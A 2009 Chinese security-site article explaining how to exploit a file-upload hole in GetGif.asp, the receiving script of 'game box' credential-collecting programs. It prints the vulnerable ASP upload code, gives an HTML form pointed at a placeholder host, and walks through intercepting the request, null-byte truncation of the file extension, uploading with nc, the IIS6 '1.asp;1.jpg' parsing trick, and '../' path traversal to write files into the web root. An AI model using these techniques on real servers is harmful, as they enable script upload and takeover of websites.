首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>漏洞资料>文章内容
最新的游戏箱子收信程序上传漏洞利用方法
来源:http://www.cnyzy.cn/ 作者:影子鹰 发布时间:2009-10-12  
文章写得简洁一点,但是大家应该能看得懂!
存在这个漏洞的箱子程序还是挺多的!皇马,吉祥什么的好像都有!
首先看一下存在漏洞的具体文件代码,文件名称是GetGif.asp


[Copy to clipboard]CODE:
<!--#include file="config.asp"-->
<% 
Response.Buffer = True 
Server.ScriptTimeOut=180 
'On Error Resume Next
'dim SavePath
ExtName = "jpg,gif,png" '允许扩展名 
SavePath =imgFolder '保存路径 
If Right(SavePath,1)<>"/" Then SavePath=SavePath&"/" '在目录后加(/) 
CheckAndCreateFolder(SavePath) 
UpLoadAll_a = Request.TotalBytes '取得客户端全部内容 
If(UpLoadAll_a<=0) Then
Response.Write "Sorry"  
Response.End 
end if

Set UploadStream_c = Server.CreateObject("ADODB.Stream") 
UploadStream_c.Type = 1 
UploadStream_c.Open 
UploadStream_c.Write Request.BinaryRead(UpLoadAll_a) 
UploadStream_c.Position = 0 
FormDataAll_d = UploadStream_c.Read 
CrLf_e = chrB(13)&chrB(10) 
FormStart_f = InStrB(FormDataAll_d,CrLf_e) 
FormEnd_g = InStrB(FormStart_f+1,FormDataAll_d,CrLf_e) 
Set FormStream_h = Server.Createobject("ADODB.Stream") 
FormStream_h.Type = 1 
FormStream_h.Open 
UploadStream_c.Position = FormStart_f + 1 
UploadStream_c.CopyTo FormStream_h,FormEnd_g-FormStart_f-3 
FormStream_h.Position = 0 
FormStream_h.Type = 2 
FormStream_h.CharSet = "GB2312" 
FormStreamText_i = FormStream_h.Readtext 
FormStream_h.Close 
FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,"\")+1,FormEnd_g) 
'FileName_j = Mid(FormStreamText_i,InstrRev(FormStreamText_i,"=")+2,FormEnd_g) 
'Response.Write FileName_j
If(CheckFileExt(FileName_j,ExtName)) Then 
SaveFile = Server.MapPath(SavePath & FileName_j) 
'SaveFile=SavePath & FileName_j
If Err Then 
Response.Write "Sorry"  
Err.Clear
Response.End

Else 
SaveFile = CheckFileExists(SaveFile) 
k=Instrb(FormDataAll_d,CrLf_e&CrLf_e)+4 
l=Instrb(k+1,FormDataAll_d,leftB(FormDataAll_d,FormStart_f-1))-k-2 
FormStream_h.Type=1 
FormStream_h.Open 
UploadStream_c.Position=k-1 
UploadStream_c.CopyTo FormStream_h,l 
FormStream_h.SaveToFile SaveFile,2 
SaveFileName = Mid(SaveFile,InstrRev(SaveFile,"\")+1) 
Response.write "OK" 
Response.End
End If 
Else 
Response.Write "Sorry"  
Response.End 
End If 
%>
<% 
'判断文件类型是否合格 
Function CheckFileExt(FileName,ExtName) '文件名,允许上传文件类型 
FileType = ExtName 
FileType = Split(FileType,",") 
For i = 0 To Ubound(FileType) 
If LCase(Right(FileName,3)) = LCase(FileType(i)) then 
CheckFileExt = True 
Exit Function 
Else 
CheckFileExt = False 
End if 
Next 
End Function 
'检查上传文件夹是否存在,不存在则创建文件夹 
Function CheckAndCreateFolder(FolderName) 
fldr = Server.Mappath(FolderName) 
Set fso = CreateObject("Scripting.FileSystemObject") 
If Not fso.FolderExists(fldr) Then 
fso.CreateFolder(fldr) 
End If 
Set fso = Nothing 
End Function 
'检查文件是否存在,重命名存在文件 
Function CheckFileExists(FileName) 
Set fso=Server.CreateObject("Scripting.FileSystemObject") 
If fso.FileExists(SaveFile) Then 
i=1 
msg=True 
Do While msg 
CheckFileExists = Replace(SaveFile,Right(SaveFile,4),"_" & i & Right(SaveFile,4)) 
If not fso.FileExists(CheckFileExists) Then 
msg=False 
End If 
i=i+1 
Loop 
Else 
CheckFileExists = FileName 
End If 
Set fso=Nothing 
End Function 
%>

也是很简洁的一个上传代码,也存在上传漏洞,使我们想起了DVBBS的上传漏洞,自己动手写一个HTML提交页面


[Copy to clipboard]CODE:
<form action=http://www.xxx.com/getgif.asp method="post" enctype="multipart/form-data" name="form1">
<p>
<input name="file" type="file" size="50">
</p>
<p>
<input type="submit" name="Submit" value="提交">
</p>
</form>

然后抓包,改包“20“-“00“,NC上传就可以了~这步骤不明白的朋友可以参考一下DVBBS的上传漏洞
以上方法通杀IIS5和IIS6,还有一种方法就是针对IIS6的解析漏洞,可以上传一个1.asp;1.jpg文件也是可以的!
此外还有一个就是针对路径的问题,因为默认的上传路径是/img/
但是很多箱子的主人都把这个路径改掉了,如改成/img001/,更有甚者将目录设置的更为复杂
针对这种情况的解决方法是在包中添加“../”,添加数目可以不是一个,如果箱子主人设置的很BT的话,可以通过提交多个“../”,在发生提交错误时,之前提交的文件就会被上传到网站的根目录了!具体情况还请大家具体分析一下!
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·XSOK环境变量本地命令执行漏洞
·N点虚拟主机管理系统 致命漏洞。
·南方数据企业网站管理系统V10.0
·动网(DVBBS)Version 8.2.0 后
·Solaris 10 telnet漏洞及解决
·破解无线路由器密码,常见无线密
·Nginx %00空字节执行php漏洞
·WinWebMail、7I24提权漏洞
·XPCD xpcd-svga本地缓冲区溢出漏
·Struts2多个漏洞简要分析
·ecshop2.72 api.php 文件鸡肋注
·Discuz!后台拿Webshell 0day
  相关文章
·动网论坛DvBBS boardrule.php模
·深度学习(asp)网址导航0day
·AspBar V3.0整站管理系统0day
·dedecms(plus/feedback_js.php)
·大榕树网络文章管理系统0day
·tomcat和jboss网站%00欺骗
·科讯CMS文件名解析漏洞
·DEDECMS 5.1 feedback_js.php 0D
·中易广告联盟系统(ZYADS) sql注
·睛天电影系统0DAY
·PunBB官方上传附件扩展注射漏洞
·新的新云0DAY发布 2009年09月20
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved